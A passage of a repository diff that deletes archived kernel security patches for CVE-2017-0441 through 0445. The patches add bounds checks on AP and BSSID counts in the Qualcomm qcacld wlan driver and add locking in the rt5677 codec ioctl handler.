-+            hddLog(LOGW, FL("Ignoring excess AP"));
-+            break;
-+        }
-+
-         if (nla_parse(tb2, QCA_WLAN_VENDOR_ATTR_EXTSCAN_SUBCMD_CONFIG_PARAM_MAX,
-                 nla_data(apTh), nla_len(apTh),
-                 wlan_hdd_extscan_config_policy)) {
-@@ -2949,6 +2959,12 @@ static int __wlan_hdd_cfg80211_extscan_set_bssid_hotlist(struct wiphy *wiphy,
-         i++;
-     }
- 
-+    if (i < pReqMsg->numAp) {
-+        hddLog(LOGW, FL("Number of AP %u less than expected %u"),
-+               i, pReqMsg->numAp);
-+        pReqMsg->numAp = i;
-+    }
-+
-     context = &pHddCtx->ext_scan_context;
-     spin_lock(&hdd_context_lock);
-     INIT_COMPLETION(context->response_event);
-diff --git a/CORE/SERVICES/WMA/wma.c b/CORE/SERVICES/WMA/wma.c
-index 2cf66bf..8ab1d2d 100644
---- a/CORE/SERVICES/WMA/wma.c
-+++ b/CORE/SERVICES/WMA/wma.c
-@@ -28633,8 +28633,8 @@ VOS_STATUS wma_get_buf_extscan_hotlist_cmd(tp_wma_handle wma_handle,
- 	/* setbssid hotlist expects the bssid list
- 	 * to be non zero value
- 	 */
--	if (!numap) {
--		WMA_LOGE("%s: Invalid number of bssid's", __func__);
-+	if ((numap <= 0) || (numap > WLAN_EXTSCAN_MAX_HOTLIST_APS)) {
-+		WMA_LOGE("%s: Invalid number of APs: %d", __func__, numap);
- 		return VOS_STATUS_E_INVAL;
- 	}
- 	num_entries = wma_get_hotlist_entries_per_page(wma_handle->wmi_handle,
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0441/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2017-0441/qcacld-2.0/0001.patch
deleted file mode 100644
index 5ec531e3..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0441/qcacld-2.0/0001.patch
+++ /dev/null
@@ -1,90 +0,0 @@
-From da87131740351b833f17f05dfa859977bc1e7684 Mon Sep 17 00:00:00 2001
-From: Jeff Johnson <jjohnson@codeaurora.org>
-Date: Tue, 29 Nov 2016 08:19:13 -0800
-Subject: qcacld-2.0: Avoid overflow of "significant change" params
-
-The wlan driver supports the following vendor command:
-	QCA_NL80211_VENDOR_SUBCMD_EXTSCAN_SET_SIGNIFICANT_CHANGE
-
-This command supplies a "number of APs" attribute as well as a list of
-per-AP attributes.  However there is no validation that the number of
-APs provided won't overflow the destination buffer.  In addition there
-is no validation that the number of APs actually provided matches the
-number of APs expected.
-
-To address these issues:
-* Verify that the expected number of APs doesn't exceed the maximum
-  allowed number of APs
-* Verify that the actual number of APs supplied doesn't exceed the
-  expected number of APs
-* Only process the actual number of supplied APs if it is less than
-  the expected number of APs.
-
-Change-Id: I0513ffbc4a38f1d7ddbc0815d3618fc9a2ea4f77
-CRs-Fixed: 1095009
----
- CORE/HDD/src/wlan_hdd_cfg80211.c | 16 ++++++++++++++++
- CORE/SERVICES/WMA/wma.c          |  6 +++---
- 2 files changed, 19 insertions(+), 3 deletions(-)
-
-diff --git a/CORE/HDD/src/wlan_hdd_cfg80211.c b/CORE/HDD/src/wlan_hdd_cfg80211.c
-index 800d123..d91859f 100644
---- a/CORE/HDD/src/wlan_hdd_cfg80211.c
-+++ b/CORE/HDD/src/wlan_hdd_cfg80211.c
-@@ -3342,6 +3342,11 @@ static int __wlan_hdd_cfg80211_extscan_set_significant_change(
-     }
-     pReqMsg->numAp = nla_get_u32(
-             tb[QCA_WLAN_VENDOR_ATTR_EXTSCAN_SIGNIFICANT_CHANGE_PARAMS_NUM_AP]);
-+    if (pReqMsg->numAp > WLAN_EXTSCAN_MAX_SIGNIFICANT_CHANGE_APS) {
-+        hddLog(LOGE, FL("Number of AP %u exceeds max %u"),
-+               pReqMsg->numAp, WLAN_EXTSCAN_MAX_SIGNIFICANT_CHANGE_APS);
-+        goto fail;
-+    }
- 
-     pReqMsg->sessionId = pAdapter->sessionId;
-     hddLog(LOG1, FL("Number of AP %d Session Id %d"), pReqMsg->numAp,
-@@ -3350,6 +3355,12 @@ static int __wlan_hdd_cfg80211_extscan_set_significant_change(
-     i = 0;
-     nla_for_each_nested(apTh,
-                 tb[QCA_WLAN_VENDOR_ATTR_EXTSCAN_AP_THRESHOLD_PARAM], rem) {
-+
-+        if (i == pReqMsg->numAp) {
-+            hddLog(LOGW, FL("Ignoring excess AP"));
-+            break;
-+        }
-+
-         if (nla_parse(tb2,
-                 QCA_WLAN_VENDOR_ATTR_EXTSCAN_SUBCMD_CONFIG_PARAM_MAX,
-                 nla_data(apTh), nla_len(apTh),
-@@ -3389,6 +3400,11 @@ static int __wlan_hdd_cfg80211_extscan_set_significant_change(
- 
-         i++;
-     }
-+    if (i < pReqMsg->numAp) {
-+        hddLog(LOGW, FL("Number of AP %u less than expected %u"),
-+               i, pReqMsg->numAp);
-+        pReqMsg->numAp = i;
-+    }
- 
-     context = &pHddCtx->ext_scan_context;
-     spin_lock(&hdd_context_lock);
-diff --git a/CORE/SERVICES/WMA/wma.c b/CORE/SERVICES/WMA/wma.c
-index 0f803d4..2cf66bf 100644
---- a/CORE/SERVICES/WMA/wma.c
-+++ b/CORE/SERVICES/WMA/wma.c
-@@ -28926,9 +28926,9 @@ VOS_STATUS wma_get_buf_extscan_change_monitor_cmd(tp_wma_handle wma_handle,
- 	int numap = psigchange->numAp;
- 	tSirAPThresholdParam  *src_ap = psigchange->ap;
- 
--	if (!numap) {
--		WMA_LOGE("%s: Invalid number of bssid's",
--			__func__);
-+	if ((numap <= 0) || (numap > WLAN_EXTSCAN_MAX_SIGNIFICANT_CHANGE_APS)) {
-+		WMA_LOGE("%s: Invalid number of APs: %d",
-+			__func__, numap);
- 		return VOS_STATUS_E_INVAL;
- 	}
- 	len += WMI_TLV_HDR_SIZE;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0441/qcacld-3.0/0002.patch b/Patches/Linux_CVEs/CVE-2017-0441/qcacld-3.0/0002.patch
deleted file mode 100644
index aca2f6a2..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0441/qcacld-3.0/0002.patch
+++ /dev/null
@@ -1,76 +0,0 @@
-From e578706506f98a4962220066d92d81e853ac7212 Mon Sep 17 00:00:00 2001
-From: Jeff Johnson <jjohnson@codeaurora.org>
-Date: Tue, 29 Nov 2016 08:54:18 -0800
-Subject: qcacld-3.0: Avoid overflow of "significant change" params
-
-This is a qcacld-2.0 to qcacld-3.0 propagation.
-
-The wlan driver supports the following vendor command:
-	QCA_NL80211_VENDOR_SUBCMD_EXTSCAN_SET_SIGNIFICANT_CHANGE
-
-This command supplies a "number of APs" attribute as well as a list of
-per-AP attributes.  However there is no validation that the number of
-APs provided won't overflow the destination buffer.  In addition there
-is no validation that the number of APs actually provided matches the
-number of APs expected.
-
-To address these issues:
-* Verify that the expected number of APs doesn't exceed the maximum
-  allowed number of APs
-* Verify that the actual number of APs supplied doesn't exceed the
-  expected number of APs
-* Only process the actual number of supplied APs if it is less than
-  the expected number of APs.
-
-Change-Id: I0513ffbc4a38f1d7ddbc0815d3618fc9a2ea4f77
-CRs-Fixed: 1095009
----
- core/hdd/src/wlan_hdd_ext_scan.c | 18 ++++++++++++++++++
- 1 file changed, 18 insertions(+)
-
-diff --git a/core/hdd/src/wlan_hdd_ext_scan.c b/core/hdd/src/wlan_hdd_ext_scan.c
-index 86a51f7..320ea3c 100644
---- a/core/hdd/src/wlan_hdd_ext_scan.c
-+++ b/core/hdd/src/wlan_hdd_ext_scan.c
-@@ -2320,6 +2320,13 @@ __wlan_hdd_cfg80211_extscan_set_significant_change(struct wiphy *wiphy,
- 	pReqMsg->numAp =
- 		nla_get_u32(tb
- 		    [QCA_WLAN_VENDOR_ATTR_EXTSCAN_SIGNIFICANT_CHANGE_PARAMS_NUM_AP]);
-+	if (pReqMsg->numAp > WLAN_EXTSCAN_MAX_SIGNIFICANT_CHANGE_APS) {
-+		hdd_err("Number of AP %u exceeds max %u",
-+			pReqMsg->numAp,
-+			WLAN_EXTSCAN_MAX_SIGNIFICANT_CHANGE_APS);
-+		goto fail;
-+	}
-+
- 	pReqMsg->sessionId = pAdapter->sessionId;
- 	hdd_notice("Number of AP %d Session Id %d",
- 		pReqMsg->numAp, pReqMsg->sessionId);
-@@ -2328,6 +2335,12 @@ __wlan_hdd_cfg80211_extscan_set_significant_change(struct wiphy *wiphy,
- 	nla_for_each_nested(apTh,
- 			    tb[QCA_WLAN_VENDOR_ATTR_EXTSCAN_AP_THRESHOLD_PARAM],
- 			    rem) {
-+
-+		if (i == pReqMsg->numAp) {
-+			hdd_warn("Ignoring excess AP");
-+			break;
-+		}
-+
- 		if (nla_parse
- 		    (tb2, QCA_WLAN_VENDOR_ATTR_EXTSCAN_SUBCMD_CONFIG_PARAM_MAX,
- 		    nla_data(apTh), nla_len(apTh),
-@@ -2372,6 +2385,11 @@ __wlan_hdd_cfg80211_extscan_set_significant_change(struct wiphy *wiphy,
- 
- 		i++;
- 	}
-+	if (i < pReqMsg->numAp) {
-+		hdd_warn("Number of AP %u less than expected %u",
-+			 i, pReqMsg->numAp);
-+		pReqMsg->numAp = i;
-+	}
- 
- 	context = &ext_scan_context;
- 	spin_lock(&context->context_lock);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0442/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2017-0442/qcacld-2.0/0001.patch
deleted file mode 100644
index 3e7bc3db..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0442/qcacld-2.0/0001.patch
+++ /dev/null
@@ -1,128 +0,0 @@
-From 1f0b036dc74ccb6e9f0a03a540efdb0876f5ca77 Mon Sep 17 00:00:00 2001
-From: Jeff Johnson <jjohnson@codeaurora.org>
-Date: Mon, 28 Nov 2016 09:19:02 -0800
-Subject: qcacld-2.0: Avoid overflow of roam subcmd params
-
-Currently when processing the QCA_NL80211_VENDOR_SUBCMD_ROAM vendor
-command, for the following roam commands there are input validation
-issues:
-	QCA_WLAN_VENDOR_ATTR_ROAM_SUBCMD_SET_BSSID_PREFS
-	QCA_WLAN_VENDOR_ATTR_ROAM_SUBCMD_SET_BLACKLIST_BSSID
-
-Both of these commands have a "number of BSSIDs" attribute as well as a
-list of BSSIDs. However there is no validation that the number of
-BSSIDs provided won't overflow the destination buffer.  In addition
-there is no validation that the number of BSSIDs actually provided
-matches the number of BSSIDs expected.
-
-To address these issues, for the above mentioned commands:
-* Verify that the expected number of BSSIDs doesn't exceed the maximum
-  allowed number of BSSIDs
-* Verify that the actual number of BSSIDs supplied doesn't exceed the
-  expected number of BSSIDs
-* Only process the actual number of supplied BSSIDs if it is less than
-  the expected number of BSSIDs.
-
-Change-Id: Ifa6121ee1b1441ec415198897ef815b40cb5aff6
-CRs-Fixed: 1092497
----
- CORE/HDD/src/wlan_hdd_cfg80211.c | 43 ++++++++++++++++++++++++++++++++++------
- 1 file changed, 37 insertions(+), 6 deletions(-)
-
-diff --git a/CORE/HDD/src/wlan_hdd_cfg80211.c b/CORE/HDD/src/wlan_hdd_cfg80211.c
-index b3c265c..800d123 100644
---- a/CORE/HDD/src/wlan_hdd_cfg80211.c
-+++ b/CORE/HDD/src/wlan_hdd_cfg80211.c
-@@ -1870,6 +1870,7 @@ __wlan_hdd_cfg80211_set_ext_roam_params(struct wiphy *wiphy,
- 	struct nlattr *tb2[QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_MAX + 1];
- 	int rem, i;
- 	uint32_t buf_len = 0;
-+	uint32_t count;
- 	int ret;
- 
- 	if (VOS_FTM_MODE == hdd_get_conparam()) {
-@@ -2045,15 +2046,25 @@ __wlan_hdd_cfg80211_set_ext_roam_params(struct wiphy *wiphy,
- 			hddLog(LOGE, FL("attr num of preferred bssid failed"));
- 			goto fail;
- 		}
--		roam_params.num_bssid_favored = nla_get_u32(
-+		count = nla_get_u32(
- 			tb[QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_SET_LAZY_ROAM_NUM_BSSID]);
-+		if (count > MAX_BSSID_FAVORED) {
-+			hddLog(LOGE, FL("Preferred BSSID count %u exceeds max %u"),
-+			       count, MAX_BSSID_FAVORED);
-+			goto fail;
-+		}
- 		hddLog(VOS_TRACE_LEVEL_DEBUG,
--			FL("Num of Preferred BSSID (%d)"),
--			roam_params.num_bssid_favored);
-+			FL("Num of Preferred BSSID: %d"), count);
- 		i = 0;
- 		nla_for_each_nested(curr_attr,
- 			tb[QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_SET_BSSID_PREFS],
- 			rem) {
-+
-+			if (i == count) {
-+				hddLog(LOGW, FL("Ignoring excess Preferred BSSID"));
-+				break;
-+			}
-+
- 			if (nla_parse(tb2,
- 				QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_MAX,
- 				nla_data(curr_attr), nla_len(curr_attr),
-@@ -2083,6 +2094,11 @@ __wlan_hdd_cfg80211_set_ext_roam_params(struct wiphy *wiphy,
- 				roam_params.bssid_favored_factor[i]);
- 			i++;
- 		}
-+		if (i < count)
-+			hddLog(LOGW,
-+			       FL("Num Preferred BSSID %u less than expected %u"),
-+			       i, count);
-+		roam_params.num_bssid_favored = i;
- 		sme_update_roam_params(pHddCtx->hHal, session_id,
- 			roam_params, REASON_ROAM_SET_FAVORED_BSSID);
- 		break;
-@@ -2092,15 +2108,25 @@ __wlan_hdd_cfg80211_set_ext_roam_params(struct wiphy *wiphy,
- 			hddLog(LOGE, FL("attr num of blacklist bssid failed"));
- 			goto fail;
- 		}
--		roam_params.num_bssid_avoid_list = nla_get_u32(
-+		count = nla_get_u32(
- 			tb[QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_SET_BSSID_PARAMS_NUM_BSSID]);
-+		if (count > MAX_BSSID_AVOID_LIST) {
-+			hddLog(LOGE, FL("Blacklist BSSID count %u exceeds max %u"),
-+			       count, MAX_BSSID_AVOID_LIST);
-+			goto fail;
-+		}
- 		hddLog(VOS_TRACE_LEVEL_DEBUG,
--			FL("Num of blacklist BSSID (%d)"),
--			roam_params.num_bssid_avoid_list);
-+			FL("Num of blacklist BSSID: %d"), count);
- 		i = 0;
- 		nla_for_each_nested(curr_attr,
- 			tb[QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_SET_BSSID_PARAMS],
- 			rem) {
-+
-+			if (i == count) {
-+				hddLog(LOGW, FL("Ignoring excess Blacklist BSSID"));
-+				break;
-+			}
-+
- 			if (nla_parse(tb2,
- 				QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_MAX,
- 				nla_data(curr_attr), nla_len(curr_attr),
-@@ -2121,6 +2147,11 @@ __wlan_hdd_cfg80211_set_ext_roam_params(struct wiphy *wiphy,
- 				roam_params.bssid_avoid_list[i]));
- 			i++;
- 		}
-+		if (i < count)
-+			hddLog(LOGW,
-+			       FL("Num Blacklist BSSID %u less than expected %u"),
-+			       i, count);
-+		roam_params.num_bssid_avoid_list = i;
- 		sme_update_roam_params(pHddCtx->hHal, session_id,
- 			roam_params, REASON_ROAM_SET_BLACKLIST_BSSID);
- 		break;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0443/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2017-0443/qcacld-2.0/0001.patch
deleted file mode 100644
index c157c6d2..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0443/qcacld-2.0/0001.patch
+++ /dev/null
@@ -1,128 +0,0 @@
-From f1081e78eff75ca665c662493736b17cb792b46d Mon Sep 17 00:00:00 2001
-From: Jeff Johnson <jjohnson@codeaurora.org>
-Date: Mon, 28 Nov 2016 09:19:02 -0800
-Subject: qcacld-2.0: Avoid overflow of roam subcmd params
-
-Currently when processing the QCA_NL80211_VENDOR_SUBCMD_ROAM vendor
-command, for the following roam commands there are input validation
-issues:
-	QCA_WLAN_VENDOR_ATTR_ROAM_SUBCMD_SET_BSSID_PREFS
-	QCA_WLAN_VENDOR_ATTR_ROAM_SUBCMD_SET_BLACKLIST_BSSID
-
-Both of these commands have a "number of BSSIDs" attribute as well as a
-list of BSSIDs. However there is no validation that the number of
-BSSIDs provided won't overflow the destination buffer.  In addition
-there is no validation that the number of BSSIDs actually provided
-matches the number of BSSIDs expected.
-
-To address these issues, for the above mentioned commands:
-* Verify that the expected number of BSSIDs doesn't exceed the maximum
-  allowed number of BSSIDs
-* Verify that the actual number of BSSIDs supplied doesn't exceed the
-  expected number of BSSIDs
-* Only process the actual number of supplied BSSIDs if it is less than
-  the expected number of BSSIDs.
-
-Change-Id: Ifa6121ee1b1441ec415198897ef815b40cb5aff6
-CRs-Fixed: 1092497
----
- CORE/HDD/src/wlan_hdd_cfg80211.c | 43 ++++++++++++++++++++++++++++++++++------
- 1 file changed, 37 insertions(+), 6 deletions(-)
-
-diff --git a/CORE/HDD/src/wlan_hdd_cfg80211.c b/CORE/HDD/src/wlan_hdd_cfg80211.c
-index b3c265c..800d123 100644
---- a/CORE/HDD/src/wlan_hdd_cfg80211.c
-+++ b/CORE/HDD/src/wlan_hdd_cfg80211.c
-@@ -1870,6 +1870,7 @@ __wlan_hdd_cfg80211_set_ext_roam_params(struct wiphy *wiphy,
- 	struct nlattr *tb2[QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_MAX + 1];
- 	int rem, i;
- 	uint32_t buf_len = 0;
-+	uint32_t count;
- 	int ret;
- 
- 	if (VOS_FTM_MODE == hdd_get_conparam()) {
-@@ -2045,15 +2046,25 @@ __wlan_hdd_cfg80211_set_ext_roam_params(struct wiphy *wiphy,
- 			hddLog(LOGE, FL("attr num of preferred bssid failed"));
- 			goto fail;
- 		}
--		roam_params.num_bssid_favored = nla_get_u32(
-+		count = nla_get_u32(
- 			tb[QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_SET_LAZY_ROAM_NUM_BSSID]);
-+		if (count > MAX_BSSID_FAVORED) {
-+			hddLog(LOGE, FL("Preferred BSSID count %u exceeds max %u"),
-+			       count, MAX_BSSID_FAVORED);
-+			goto fail;
-+		}
- 		hddLog(VOS_TRACE_LEVEL_DEBUG,
--			FL("Num of Preferred BSSID (%d)"),
--			roam_params.num_bssid_favored);
-+			FL("Num of Preferred BSSID: %d"), count);
- 		i = 0;
- 		nla_for_each_nested(curr_attr,
- 			tb[QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_SET_BSSID_PREFS],
- 			rem) {
-+
-+			if (i == count) {
-+				hddLog(LOGW, FL("Ignoring excess Preferred BSSID"));
-+				break;
-+			}
-+
- 			if (nla_parse(tb2,
- 				QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_MAX,
- 				nla_data(curr_attr), nla_len(curr_attr),
-@@ -2083,6 +2094,11 @@ __wlan_hdd_cfg80211_set_ext_roam_params(struct wiphy *wiphy,
- 				roam_params.bssid_favored_factor[i]);
- 			i++;
- 		}
-+		if (i < count)
-+			hddLog(LOGW,
-+			       FL("Num Preferred BSSID %u less than expected %u"),
-+			       i, count);
-+		roam_params.num_bssid_favored = i;
- 		sme_update_roam_params(pHddCtx->hHal, session_id,
- 			roam_params, REASON_ROAM_SET_FAVORED_BSSID);
- 		break;
-@@ -2092,15 +2108,25 @@ __wlan_hdd_cfg80211_set_ext_roam_params(struct wiphy *wiphy,
- 			hddLog(LOGE, FL("attr num of blacklist bssid failed"));
- 			goto fail;
- 		}
--		roam_params.num_bssid_avoid_list = nla_get_u32(
-+		count = nla_get_u32(
- 			tb[QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_SET_BSSID_PARAMS_NUM_BSSID]);
-+		if (count > MAX_BSSID_AVOID_LIST) {
-+			hddLog(LOGE, FL("Blacklist BSSID count %u exceeds max %u"),
-+			       count, MAX_BSSID_AVOID_LIST);
-+			goto fail;
-+		}
- 		hddLog(VOS_TRACE_LEVEL_DEBUG,
--			FL("Num of blacklist BSSID (%d)"),
--			roam_params.num_bssid_avoid_list);
-+			FL("Num of blacklist BSSID: %d"), count);
- 		i = 0;
- 		nla_for_each_nested(curr_attr,
- 			tb[QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_SET_BSSID_PARAMS],
- 			rem) {
-+
-+			if (i == count) {
-+				hddLog(LOGW, FL("Ignoring excess Blacklist BSSID"));
-+				break;
-+			}
-+
- 			if (nla_parse(tb2,
- 				QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_MAX,
- 				nla_data(curr_attr), nla_len(curr_attr),
-@@ -2121,6 +2147,11 @@ __wlan_hdd_cfg80211_set_ext_roam_params(struct wiphy *wiphy,
- 				roam_params.bssid_avoid_list[i]));
- 			i++;
- 		}
-+		if (i < count)
-+			hddLog(LOGW,
-+			       FL("Num Blacklist BSSID %u less than expected %u"),
-+			       i, count);
-+		roam_params.num_bssid_avoid_list = i;
- 		sme_update_roam_params(pHddCtx->hHal, session_id,
- 			roam_params, REASON_ROAM_SET_BLACKLIST_BSSID);
- 		break;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0443/qcacld-3.0/0002.patch b/Patches/Linux_CVEs/CVE-2017-0443/qcacld-3.0/0002.patch
deleted file mode 100644
index 21823da6..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0443/qcacld-3.0/0002.patch
+++ /dev/null
@@ -1,126 +0,0 @@
-From a4c5eefd5dd761445784963f3b6605d24d2bc3af Mon Sep 17 00:00:00 2001
-From: Jeff Johnson <jjohnson@codeaurora.org>
-Date: Tue, 29 Nov 2016 07:22:08 -0800
-Subject: qcacld-3.0: Avoid overflow of roam subcmd params
-
-This is a qcacld-2.0 to qcacld-3.0 propagation.
-
-Currently when processing the QCA_NL80211_VENDOR_SUBCMD_ROAM vendor
-command, for the following roam commands there are input validation
-issues:
-	QCA_WLAN_VENDOR_ATTR_ROAM_SUBCMD_SET_BSSID_PREFS
-	QCA_WLAN_VENDOR_ATTR_ROAM_SUBCMD_SET_BLACKLIST_BSSID
-
-Both of these commands have a "number of BSSIDs" attribute as well as a
-list of BSSIDs. However there is no validation that the number of
-BSSIDs provided won't overflow the destination buffer.  In addition
-there is no validation that the number of BSSIDs actually provided
-matches the number of BSSIDs expected.
-
-To address these issues, for the above mentioned commands:
-* Verify that the expected number of BSSIDs doesn't exceed the maximum
-  allowed number of BSSIDs
-* Verify that the actual number of BSSIDs supplied doesn't exceed the
-  expected number of BSSIDs
-* Only process the actual number of supplied BSSIDs if it is less than
-  the expected number of BSSIDs.
-
-Change-Id: Ifa6121ee1b1441ec415198897ef815b40cb5aff6
-CRs-Fixed: 1092497
----
- core/hdd/src/wlan_hdd_cfg80211.c | 41 ++++++++++++++++++++++++++++++++++------
- 1 file changed, 35 insertions(+), 6 deletions(-)
-
-diff --git a/core/hdd/src/wlan_hdd_cfg80211.c b/core/hdd/src/wlan_hdd_cfg80211.c
-index 169629a..c457140 100644
---- a/core/hdd/src/wlan_hdd_cfg80211.c
-+++ b/core/hdd/src/wlan_hdd_cfg80211.c
-@@ -2339,6 +2339,7 @@ __wlan_hdd_cfg80211_set_ext_roam_params(struct wiphy *wiphy,
- 	struct nlattr *tb2[QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_MAX + 1];
- 	int rem, i;
- 	uint32_t buf_len = 0;
-+	uint32_t count;
- 	int ret;
- 
- 	ENTER_DEV(dev);
-@@ -2509,14 +2510,24 @@ __wlan_hdd_cfg80211_set_ext_roam_params(struct wiphy *wiphy,
- 			hdd_err("attr num of preferred bssid failed");
- 			goto fail;
- 		}
--		roam_params.num_bssid_favored = nla_get_u32(
-+		count = nla_get_u32(
- 			tb[QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_SET_LAZY_ROAM_NUM_BSSID]);
--		hdd_debug("Num of Preferred BSSID (%d)",
--			roam_params.num_bssid_favored);
-+		if (count > MAX_BSSID_FAVORED) {
-+			hdd_err("Preferred BSSID count %u exceeds max %u",
-+				count, MAX_BSSID_FAVORED);
-+			goto fail;
-+		}
-+		hdd_debug("Num of Preferred BSSID (%d)", count);
- 		i = 0;
- 		nla_for_each_nested(curr_attr,
- 			tb[QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_SET_BSSID_PREFS],
- 			rem) {
-+
-+			if (i == count) {
-+				hdd_warn("Ignoring excess Preferred BSSID");
-+				break;
-+			}
-+
- 			if (nla_parse(tb2,
- 				QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_MAX,
- 				nla_data(curr_attr), nla_len(curr_attr),
-@@ -2545,6 +2556,10 @@ __wlan_hdd_cfg80211_set_ext_roam_params(struct wiphy *wiphy,
- 				roam_params.bssid_favored_factor[i]);
- 			i++;
- 		}
-+		if (i < count)
-+			hdd_warn("Num Preferred BSSID %u less than expected %u",
-+				 i, count);
-+		roam_params.num_bssid_favored = i;
- 		sme_update_roam_params(pHddCtx->hHal, session_id,
- 			roam_params, REASON_ROAM_SET_FAVORED_BSSID);
- 		break;
-@@ -2554,14 +2569,24 @@ __wlan_hdd_cfg80211_set_ext_roam_params(struct wiphy *wiphy,
- 			hdd_err("attr num of blacklist bssid failed");
- 			goto fail;
- 		}
--		roam_params.num_bssid_avoid_list = nla_get_u32(
-+		count = nla_get_u32(
- 			tb[QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_SET_BSSID_PARAMS_NUM_BSSID]);
--		hdd_debug("Num of blacklist BSSID (%d)",
--			roam_params.num_bssid_avoid_list);
-+		if (count > MAX_BSSID_AVOID_LIST) {
-+			hdd_err("Blacklist BSSID count %u exceeds max %u",
-+				count, MAX_BSSID_AVOID_LIST);
-+			goto fail;
-+		}
-+		hdd_debug("Num of blacklist BSSID (%d)", count);
- 		i = 0;
- 		nla_for_each_nested(curr_attr,
- 			tb[QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_SET_BSSID_PARAMS],
- 			rem) {
-+
-+			if (i == count) {
-+				hdd_warn("Ignoring excess Blacklist BSSID");
-+				break;
-+			}
-+
- 			if (nla_parse(tb2,
- 				QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_MAX,
- 				nla_data(curr_attr), nla_len(curr_attr),
-@@ -2582,6 +2607,10 @@ __wlan_hdd_cfg80211_set_ext_roam_params(struct wiphy *wiphy,
- 				roam_params.bssid_avoid_list[i].bytes));
- 			i++;
- 		}
-+		if (i < count)
-+			hdd_warn("Num Blacklist BSSID %u less than expected %u",
-+				 i, count);
-+		roam_params.num_bssid_avoid_list = i;
- 		sme_update_roam_params(pHddCtx->hHal, session_id,
- 			roam_params, REASON_ROAM_SET_BLACKLIST_BSSID);
- 		break;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0444/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0444/ANY/0001.patch
deleted file mode 100644
index 699a7985..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0444/ANY/0001.patch
+++ /dev/null
@@ -1,60 +0,0 @@
-From 230f280dd4046a227665ff07c9afaa7b9aa1e061 Mon Sep 17 00:00:00 2001
-From: Mark Salyzyn <salyzyn@google.com>
-Date: Thu, 17 Nov 2016 08:58:07 -0800
-Subject: rt5677: protect model_buf and model_len
-
-vad_lock is active for model_buf and model_len fields
-except during RT_WRITE_CODEC_DSP_IOCTL transactions.
-
-Signed-off-by: Mark Salyzyn <salyzyn@google.com>
-Bug: 32705232
-Change-Id: I3493909019b18a902c577c0010b41087fecb5325
----
- sound/soc/codecs/rt5677.h       |  1 +
- sound/soc/codecs/rt5677_ioctl.c | 10 ++++++++--
- 2 files changed, 9 insertions(+), 2 deletions(-)
-
-diff --git a/sound/soc/codecs/rt5677.h b/sound/soc/codecs/rt5677.h
-index 5295cfd..2375769 100644
---- a/sound/soc/codecs/rt5677.h
-+++ b/sound/soc/codecs/rt5677.h
-@@ -1468,6 +1468,7 @@ struct rt5677_priv {
- 	*/
- 	struct regmap *regmap;
- 	struct mutex index_lock;
-+	/* protects vad activities, including model_len and model_buf */
- 	struct mutex vad_lock;
- 	struct workqueue_struct *check_mic_wq;
- 	struct delayed_work check_hp_mic_work;
-diff --git a/sound/soc/codecs/rt5677_ioctl.c b/sound/soc/codecs/rt5677_ioctl.c
-index f5ee880..d3262f5 100644
---- a/sound/soc/codecs/rt5677_ioctl.c
-+++ b/sound/soc/codecs/rt5677_ioctl.c
-@@ -151,16 +151,22 @@ int rt5677_ioctl_common(struct snd_hwdep *hw, struct file *file,
- 
- 	case RT_WRITE_CODEC_DSP_IOCTL:
- 	case RT_WRITE_CODEC_DSP_IOCTL_COMPAT:
-+		mutex_lock(&rt5677->vad_lock);
- 		if (!rt5677->model_buf || rt5677->model_len < size) {
- 			vfree(rt5677->model_buf);
- 			rt5677->model_len = 0;
- 			rt5677->model_buf = vmalloc(size);
--			if (!rt5677->model_buf)
-+			if (!rt5677->model_buf) {
-+				mutex_unlock(&rt5677->vad_lock);
- 				return -ENOMEM;
-+			}
- 		}
--		if (copy_from_user(rt5677->model_buf, rt_codec.buf, size))
-+		if (copy_from_user(rt5677->model_buf, rt_codec.buf, size)) {
-+			mutex_unlock(&rt5677->vad_lock);
- 			return -EFAULT;
-+		}
- 		rt5677->model_len = size;
-+		mutex_unlock(&rt5677->vad_lock);
- 		return 0;
- 
- 	default:
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0445/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0445/ANY/0001.patch
deleted file mode 100644
index 0a9424c6..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0445/ANY/0001.patch
+++ /dev/null
@@ -1,34 +0,0 @@
-From 773179468893965c2b81aa7ffe3722b6868ef749 Mon Sep 17 00:00:00 2001
-From: Andrew Chant <achant@google.com>
